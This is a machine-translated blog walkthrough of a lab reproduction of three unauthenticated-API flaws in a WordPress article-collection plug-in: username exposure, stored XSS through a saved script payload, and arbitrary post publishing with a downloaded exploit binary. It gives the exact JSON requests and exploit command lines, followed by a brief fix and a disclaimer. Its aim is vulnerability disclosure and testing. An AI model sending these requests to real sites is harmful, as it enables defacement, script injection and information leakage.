当前位置:网站首页>The latest (2022-2-16) vulnerability of WordPress plug-in bee collection (XSS, WordPress user name exposure, arbitrary article publishing) is repeated

The latest (2022-2-16) vulnerability of WordPress plug-in bee collection (XSS, WordPress user name exposure, arbitrary article publishing) is repeated

2022-06-25 21:25:00 Deng_ Xian_ Sheng

This vulnerability is WordPress An article collection plug-in : Bee collection , There are no related to the implementation of plug-in functions API Do Authentication ; Causes requests sent by anyone to be executed .

Download vulnerability replication environment :https://pan.baidu.com/s/1Oh_FX12UGpqrH0_ydoBNUA Extraction code : wwi7

part POC and EXP:https://github.com/NonAbsolute/MiFengBaiBaoXiangPluginPOCAndEXP

Download the environment and unzip it “WordPress Plug in bee collection reproduction environment .zip”
basis README.md Set up the environment , No more retelling

Loophole I

WordPress User name exposure
The collection page of the plug-in is shown in the following figure :
Not to acquire page information API Make restrictions , Cause the attacker to gain WordPress User name and other information
 Insert picture description here
 Insert picture description here
Let's open the check element and refresh the page to see POST request
 Insert picture description here
Then copy the request URL With request content to test tool
 Insert picture description here
 Insert picture description here

URL: http://192.168.8.6:8080/wp-json/wp-beebox/v1/crawler
Content-Type: application/json
{"action":"get_config","target":"crawler"}

You can see , Get information without authentication
 Insert picture description here

Loophole two

XSS attack
In the plug-in's “ Custom code ” Add page , Also unauthenticated ; Easy to check 、 Add custom code .
 Insert picture description here
 Insert picture description here
Let's use the test tool to send a request to see

# View custom code 
URL: http://192.168.8.6:8080/wp-json/wp-beebox/v1/code
Content-Type: application/json
{"action":"fetch"}

Get the content of the custom code ( Because no custom code was added , So it's empty )
 Insert picture description here

# Add custom code 
URL: http://192.168.8.6:8080/wp-json/wp-beebox/v1/code
Content-Type: application/json
{
    "action": "save",
    "data": [
        {
            "title": "testCode",
            "content": "<script>alert(\" I'm dengwenyi , I am in Shenzhen, Guangdong !\")</script>\n<h1> I'm dengwenyi , I am in Shenzhen, Guangdong !</h1>",
            "status": "on",
            "position": "head"
        }
    ]
}

You can see , Successfully added custom code , And the page also has a response
 Insert picture description here
 Insert picture description here
 Insert picture description here
 Insert picture description here
Indicate the :“ I like that very much ; I want to write it in the text ; Don't be surprised ; harmless .”

Loophole three

Any article published
This reappearance depends on the “ part POC and EXP” The download link of .
See the specific implementation process Golang Code , and Github Warehouse README.md

We only download the executable file compiled by the author ; Just use it .
Download executable :
 Insert picture description here

Create a folder , Put the executable in ; Because it will generate logs in the execution directory
 Insert picture description here
-h See how to use
 Insert picture description here
Here I'll give you a brief explanation :

--IP  you Kali Of IP
--Port  you Kali The port of , arbitrarily ; As long as it is not occupied 
--Type  The value is 'POC' perhaps 'EXP', Default POC

--PayloadForTitle And --PayloadForMain 
 Just fill in one of the two , It is OK to fill in all ; This is a --Type by EXP In case of Payload.PayloadForTitle For the title of the post ;PayloadForMain To publish the content of the article .--Type by POC This item may not be filled in if .Payload Support file path .

--PageType  Article publishing type , yes WordPress Your article is still a page ; Default 'Article' article ; You can also fill in the page 'Page'.

--ET  Infiltrate the target , If you don't fill in , Is interactive mode ; Fill in the automatic mode ; Only file paths are supported . The objects in the document are marked with ',' Separate ; Such as :
192.168.0.1,192.168.0.2,192.168.0.3

Let's use interactive mode to test whether the vulnerability exists :

./POCAndEXP-ForDarwin -IP 192.168.8.1 -Port 8080 

 Insert picture description here
Go into interactive mode , Enter... At the prompt -h help
Here I will briefly explain :

 --ET  Infiltrate the target , The goal is to ',' Separate ; Such as :
192.168.0.1,192.168.0.2,192.168.0.3

Close  Exit interactive mode 

Loopholes found , Here's the picture :

-ET 192.168.8.6:8080

 Insert picture description here
Let's end POC, add to EXP Parameters enter EXP Test it :

./POCAndEXP-ForDarwin -IP 192.168.8.1 -Port 8080 -Type EXP -PayloadForTitle  I'm dengwenyi , I am in Shenzhen, Guangdong  --PayloadForMain  I'm dengwenyi , I am in Shenzhen, Guangdong 

 Insert picture description here
It is found that the penetration has been successful :
 Insert picture description here
see WordPress I did add an article :
 Insert picture description here
 Insert picture description here
sign out EXP, We see that many log files are generated in the current directory , It records the penetration :
 Insert picture description here

Suggestions for bug fixing

Temporarily disable the plug-in , Can avoid being affected by this vulnerability .
 Insert picture description here

Be careful ️, This test is conducted in a safe environment ; All code is limited to running in a replication environment , Do not maliciously tamper with the code and run the code outside the test environment ; Otherwise, we will be responsible for the consequences !

原网站

版权声明
本文为[Deng_ Xian_ Sheng]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/02/202202181327252875.html